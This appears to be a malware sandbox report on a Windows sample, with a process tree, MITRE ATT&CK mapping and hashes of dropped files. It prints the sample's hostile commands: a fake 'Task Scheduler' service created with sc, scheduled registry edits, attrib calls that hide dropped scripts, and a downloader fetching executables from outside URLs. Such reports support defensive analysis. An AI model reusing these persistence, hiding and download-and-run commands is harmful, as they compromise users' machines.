      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
    3⤵
    PID:1412
  - - C:\Windows\SysWOW64\sc.exe
      sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
      4⤵
      Launches sc.exe
      PID:1052
  - - C:\Windows\SysWOW64\sc.exe
      sc config Schedule start= auto
      4⤵
      Launches sc.exe
      PID:2044
  - - C:\Windows\SysWOW64\net.exe
      net start "Task Scheduler"
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        5⤵
        
        PID:1176
  - - C:\Windows\SysWOW64\at.exe
      at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:3008
  - - C:\Windows\SysWOW64\at.exe
      at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2996
  - - C:\Windows\SysWOW64\at.exe
      at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2244
  - - C:\Windows\SysWOW64\at.exe
      at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:1948
  - - C:\Windows\SysWOW64\at.exe
      at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\at.exe
      at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      PID:2844
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\360.cmd
    3⤵
    - Drops file in Program Files directory
    PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\fav.cmd
    3⤵
    - Drops file in Program Files directory
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\copy.cmd
    3⤵
    - Drops file in Program Files directory
    PID:3000
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\Microsoft\win.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:788
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\fav\fav.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1896
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\360SE.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1260
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\36OSE.vbs"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:484
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\tool.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:840
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\360.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:1920
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s "C:\Program Files\software\361.cmd"
      4⤵
      Sets file to hidden
      Drops file in Program Files directory
      Views/modifies file attributes
      PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
    3⤵
    - Loads dropped DLL
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn2.exe
      ".\msn2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2392
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://download.youbak.com/msn/software/partner/37a.exe"
        5⤵
        Executes dropped EXE
        
        PID:1416
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe" "http://soft.softdowns.info/install/YoudaoDict_zhusha_quantui_004.exe"
        5⤵
        Executes dropped EXE
        
        PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
326842ba39282821a5e86ef020b8383a

SHA1
170fbfabaac54099357ec23c3abfa370e726ba8b

SHA256
dda4be809d3ed85e94e10c8a022fd7fa6974dd838c61ead16e37ae2c61f26df4

SHA512
d0c7f21489fea612188972f41537b8865c4428641a4f76440512ca616e0223c94d00486180613a889e99a14967b829661109627b50f215801c76fd82d18cac3f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
de9b3fc2fd58259372e89b93ff00bc68

SHA1
7c79314a6b232fc2aaaee3f4d4c05462bcffa8fd

SHA256
b3367e16c3d019199f5e2fe67ea482521f4246a91b685a6df04d2f63ab497b86

SHA512
0d83d4ca1a72be194879cd5d1379ea0e2aed6febf785ec556ddb00f7134df09821843e38025d17cd6138fecde51af84660c89975a932575841d627a27efec8bc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
5ac4586943334af03ca1e08402f6001d

SHA1
413e6f4c70bc019116d1b447657620047ab42f63

SHA256
488e96f01a90bd18459aa1295cb450eb32c5d3404603fb383735f08887477314

SHA512
b76d0f35d1f1deedd3e0c5e877dfa1de8dad9cc4f2be503c98306c09c916e5a7958ba80dfaafd70fc0390c096503599494a8c4a395f105ae2e01d0e0841608ad

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c00a9ca1c631affc7e06daa1095efa27

SHA1
b418e392f1269b3dd1c1af12e1e7184cd69b8926

SHA256
e6a789ad8285b90fc670c0d674f9ed502168c3c0b252455e01b882da76feb698

SHA512
31e339610b8275f51bbc20071e0f86d7fdbf45d600f74fbb70bf2246f570f4b8230012d23cf9fbed7848a79167ede71146dd1df4ea35608b729e1a65677eb1e9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
39fde89e3caeda2bce4c67a363612b45

SHA1
efaed780763585f3f89d219739d808b063fbe56c

SHA256
e183ea0718aa185e846272fea3cde448b1d1ba383699656191fa846a79508312

SHA512
bfbb43100c0dd2ca5386221d746f578b1f6a8b36146ac1d82f23c953f93d2043e21c978a118490a6b0d6770f01772c88aec2fa50cf2782b2328f9d589582c90e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
de2d987746c81e0a40e439bed3873268

SHA1
8a7d8d395016351e107cf7915c8f1f65f067f5de

SHA256
9658fd2fd4fc66925dfb0cca2aa7ae874a1a05f51af8684f150b61cf2898486d

SHA512
a924c63a34d0b7250837e83052c5af33c806e61d23cd89c262514e53e4f8c4da100a4284d4783362998a10cf5ab589151289f8eda0b9ebe71514d32a2eff67c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ffdf45c78b0a15c4fd183331141c6ac5

SHA1
c55760a3294a013ea893b65775b502a3bc1d5287

SHA256
02f292a96f5b2740b4826a689dd5b0037a6b17b90a61cac7a9053090b5d93a02

SHA512
3fa70830c30e25083cfa064f7d7a3da6819ca60fce9c4d6015ba9cd58c2d110ce2570ac7767413d9102dc5ab0cc69cd2242ffeef77147e1156062d78de72ced1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
25926dba041e30e3a02478643a6a32e3

SHA1
252655983172a3c710708dd3bcc012c53aace7f4

SHA256
16726c4f083f15aa4578fedf4517f4ecb7014215b0e5923e7ef12fb478e505c2

SHA512
d15feb9a30643e235e0994088bae6dbbaee5f2405bdbf564d0461004edbb5604f673c6d1903cb02b66d2ce9aadd8f384ed39311fb655a5b614334394411bd446

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6b6ae6cfb3de73ab1914b67e813e5179

SHA1
1b787775158430570a489a4197a8ff4d943e70cf

SHA256
8c4c04fcbceb36325a9d2c1a7a68160f822fc7c6924991dcf23927437ccab5cb

SHA512
fd12d63323afeaa5a452fb154da53bc56a71a47299fb735f99c51de4467e0c51425de69833b19311de0f938288a75224ca7ff5feaef3ad1def4d24cb4e75680c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
4ff0426160af459f11051dd5dd198f06

SHA1
a45d0f64f67d4aa752c7e8eae1e724e3a4c644ee

SHA256
fc7adb02a0c15401f19251a2326a840085056403ff2af8bdbf113f926ef05cc0

SHA512
acb4a9aa09530f1437d1909394155557b33a65196c2c1a33b08cadd0f5eaa5367744471ecf14ef11b2c91dff563eb3d49b2d0d48012820f5d672ea7ee52d6ac5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e2fa9e91a2fec7f95ed3270a0382e66d

SHA1
25e16abfbd3f22a73b0d6ed3122c450b68c98d54

SHA256
c4d061320c9175a615d375719e3f30cf34217cd0042f60057fec14d4bd580513

SHA512
369b11469c63f192fa0a3832829e221799ebe5c4b5e4a184dab23e855cf6e7bee03f96ef8fee41c3a983716ddf516e6b2021950eb5df8771bfdd6deb5fc18d6b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
604cdf76ff522bf253b604d21307457a

SHA1
68408aa78ec200a1684646c01712457911efb3db

SHA256
12a2921278f7f68e747eac8ad5f31b9985897c7076394cc9a207b61bba6eb830

SHA512
b267bbd5c6f1b1a2d0ce0d76442963171ca6095b4fdd87cccc8ece7142201775deb289343861bfef19637d760235aa6c113d620565e73491a664ef23e2d47038

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA24B.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd

Filesize
1KB

MD5
ff9a3f5f87b9227acdf8c08482bd722a

SHA1
140a90a6f122c482aad0534f86c4939923807ccd

SHA256
a70d151c858a9ce50846784db0a8af1ce33949a6c9ab7da5f15b7fefc7b4582f

SHA512
c1c28a77aee5b026576fe6b87da51233039a261a57f1b8f844db4115f50b982d70ab0ca31a739281ecc76f1cc10655f242870963de0a72c7360f44aa8304d4eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360SE.vbs

Filesize
185B

MD5
d6de13a28f0fd2b22fc3f6775713c8c0

SHA1
d37a413584abb57756f25d4717b574aa1a720f94

SHA256
f08f5b3b06992201ee98a5b46b4c068862a1d7d2ddd029e64239ba9ac8af65c4

SHA512
0256e8e2be5800238c5530d5d0cb52b732e0cd90a5289256eb1b7394c526d9f33d454df44bced61a9d585db58215f308cb9e6d3a0fb6e6294e6e4df70aa4a1a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

Filesize
408B

MD5
26cace2b8c69829f156e2e5a8e875166

SHA1
1acaafb935e4f3b0fc9bb452824085ec7cc6250f

SHA256
ecb5eaf3fd58b904da93ad5fa9e99b3c83d3ddaa1f252b23514c458ffa90d992

SHA512
025c6a31813b36795d69bbeea504898b4ac96a03cd159c673c2b9955c0715361068cea907a2ba8d2e80dbc25695268bb23b1c8113fc36e227a05b71bb30ef171

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36OSE.vbs

Filesize
172B

MD5
a1bfbf3ce817483ea56c95034f104722

SHA1
8a281a1bfe6f0dcc2bee2a57ee16de0f54188517

SHA256
22c69237eafbe4a18920c59fe7bf0be0f648f6b6a5e02d645ce9af7c4f00cdd9

SHA512
c3e6203dbb595dba2d008c02fb29b31837ae87039159d7f16ffc4e04bea594a773738577ca09331041f0591dc2726d25857dbdf77597999131937317d4b03437

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Expl0rer.lnk

Filesize
104B

MD5
f8d9537b38d1ca9dd96796e0e4259e2d

SHA1
3d1a69967051482d528a357095f0e3b146490256

SHA256
7630b4987c74a6607b64aec726d7f0f2bf4f48793e88463d54f50be34a38d6ad

SHA512
f0ac037196a0f6c7a1c9e976cca1f361179dcbb92f25787fd48b3453d043089f2f0ed970d7da44e5f935991ba697827bc24a7957973908cd91525d4a2c53a319

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
2KB

MD5
d561f3dafa5d4501fcc9683c335e5ae7

SHA1
c18c49345bd8b29cde2abde6b057cc09d1720ac3

SHA256
74d356b1bcef9f828fef448fc10317aa298ed828ecd1975156cdecd41724afdd

SHA512
a1065d2f4d637256db40a55069a7714be8ab2c3f23c508ebdcaefbfa215300e57a8c27db836da98e8b1d1e8b369a2690dc322d194ac89cc604534aa1313eaf5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cpa.cmd

Filesize
38B

MD5
883684f4988ab30ec46bdf60e98bced1

SHA1
603c8d92f9ebc294f8c217001b9a4bea69fb4b6a

SHA256
a2a1ed2b32284627d4daceae32b5eb70b2ce3abbd2d27cc1e2643b922fe88001

SHA512
6f4a3265f6eb793a604f043a97a3d62f51ae287507c7973b2c3234b645827d4c2c192cf4ebf75b31f529d2e559c932b9c0efcc38ac4eeb7c8bcb1483a414ee14

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dodo.vbs

Filesize
872B

MD5
b14edccbff6659d1517131d881e1f27c

SHA1
5e8de433038c86b369ffed5100c1766e21609aeb

SHA256
e968464c26d1c7b4777c350c4741a5bf82b0b88140268eccc3ebb5be581d62e9

SHA512
45268dbe29f0e932a1f1ff08df7e4d24e3febb8631627acdd9a3bb6ff2ab08f049b7a789c399f3cef3d82cc643f88acf4391542808c8d42f7932ef34def9d2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\fav.cmd

Filesize
326B

MD5
29c044a690d5494a121d7a6b6d30da3d

SHA1
c2e78d6813912c0d5a891ca8f66fe3bfd050ab9a

SHA256
978de380212914478b05d3196d9bedce918b763059d94bca1c5e2b0adc094abe

SHA512
a928b5742c57b4c2e95d1231ca418256bba240274e072f9bf1388aba9d5d1dfe93f3e1044acac13d41f02c2c68912d910fd74a9966271fa08e3ff59b796ad826

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

Filesize
1KB

MD5
f8a56c9523b40d30a6c7d3fdd0596c41

SHA1
0ec063d849ee945a3786861ab6bcdeb2490f78a3

SHA256
63f22fb34c55f0e3c819fbbcdf78211a6d554408657f4790dbf0c6ec9e119755

SHA512
f01f87da52c90ca5578b8526df998665719a895d26dd645b04d15694c631b83afa91837c049e775b1b2994322f9a33b5f340a5844efb9fd64e20c26dd12d27d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_ok.vbs

Filesize
1KB

MD5
a50d6ac0ebcf0ad7e7ff62bdd4d3a472

SHA1
590e4bc339f6380daeab354bb86825a413d556cf

SHA256
b8e81550a4df07d5e146a791dbfddaf1c0a6a02ac25417973f2c7599d594f611

SHA512
a4e1a9d13567ea49c03ee9cebda295fe2c383f60fa65ac436b11241208df50aca608e5182d03ec72da2f218ace8fc7888c4d0e9024a24f64821b8f0d8b58476e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\software.vbs

Filesize
996B

MD5
c5117f8d68f5315ae984e057e7ea44a5

SHA1
c216931e5dd658ee879c1abdba845a6b2d19983c

SHA256
b35914093751954a49b23f824742feb11827fcc4bcf4750ac29aaed892f0bb8a

SHA512
2cf86754fc35c38402ee16c4507a693b67743064100eb38fdeff79de72343fbcca6a3312a414337058efa914b341136a86bb894761c4c36dac565994d3094d6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tao.ico

Filesize
16KB

MD5
4a085369ed417129dbf07e9c2dbe06bc

SHA1
0bcb813686eccf8cdc7921232fd3ff6c2a023af8

SHA256
c6031d14a1e77542c3c46941d3c296e81206e6f2bc09c4b621a66732ae80e6dc

SHA512
0539d5b4cd84a8f5964f9fb63f22b5b87fc31ae50239bcf3fd431db8a29c15f333f004b31c98fd10d965aa1b3b999f92bf7222286a64fec627aa770954515892

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tj.cmd

Filesize
1KB

MD5
3ed9a0c6984ea5e46491d42c0b5a52c9

SHA1
e57ed1a7aec9e68b1f9fabf4566bda71093198c7

SHA256
fa3971f08941880b78314e12e9df13608b99021df1b5e6245f50ffedc918dce7

SHA512
f4f0e363d37e97d5f5addba4b5003e927788273799eb6f6cd5ceaaa9fa85acce189220321f5f1fd2af97e4a64cc79ffe0f1439ee781a6c56ef72779b67103c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

Filesize
3KB

MD5
d6dd4c0778ad81c2c1aaf374215197b0

SHA1
66955616f3dbaa5f0412fa942c9f86d0d95558a0

SHA256
053280d7542c1c4a3972b714dbf19199d39a79f21ca49715014790c2cd8d5173

SHA512
d6703b3ec2c6603473f8ae89ad248f6eea53c93e66dc2a0e9b52272c397ae0684b7bf32ddf097aa849b2d3bba10620e8d8095ff2f40bb03890f011096fc1395f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\win.vbs

Filesize
156B

MD5
831c22d06a7d882ba0744682617d20b3

SHA1
f4d1cc7841f67b41e9abe23b9b3ad0a70ab688ad

SHA256
d87f839f92f936a75b40c7ba66d144c376bf633f742cdf679a907ba02c704312

SHA512
66ad58658bceb7bdde5c1649701b8187b090595da87d6faefafa1dfe8ab0bade13e672c5549381135696b59f6b0df98dcdf8896e69306629acbf20a1e19d3ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB6F6.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX0\msn2.exe

Filesize
303KB

MD5
f0489bc38e4d8c6df4c722da572be409

SHA1
4c35c622455aca23188fed347b20cfc095b11349

SHA256
77a29bdd8236c32712c3b1ba7cf535da5c56a2dbb0565d9e0fcc930f650df2cb

SHA512
8954d81f54532283cfe3c6ddb08fbdc1efda4b5812a1288767f5ebd67ed63e0b2e78e96806f963825ab15156940bb47c8d817c72ab7da8f3b7f92b8e6f4c07fb

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe

Filesize
408KB

MD5
5ab5c8763feacb9a3a9bcef82d569622

SHA1
1a36e375251dd704b16419ec15844f64191f4588

SHA256
50d08b43c5d2e24209282ae77d2ab5902e922fe7ade483c3855b8ee6b2566278

SHA512
98c24fb43a7af4c89dac6bc53b90490f09e0f936e4ebfac35dc3627f704a6ae6f24e5928c381a0e30dcce1fbf2847fcb576bcf17dcc5c13f9acdf0346958fef1

Download Submit
\Users\Admin\AppData\Local\Temp\RarSFX1\ks.exe

Filesize
493KB

MD5
adb777c5bdaf9587960a403f4d5455d1

SHA1
cd5308955baf629b11f886fa656baf03227b9b11

SHA256
98f7a5a408d676788eb894080ab3a874c0ed8d4a692167c929ea09b25d733b59

SHA512
ec968c076a8a7349fb3ed750765dc95886b43c45611d6ef87f0685e41e20efd186d63256a17ff7f2a51ae8151922764fd0f4ce7ddcdcb3ac8f02df9c30ad2e38

Download Submit
memory/1416-132-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/1416-563-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/1416-135-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download
memory/2392-133-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/2576-573-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2576-575-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads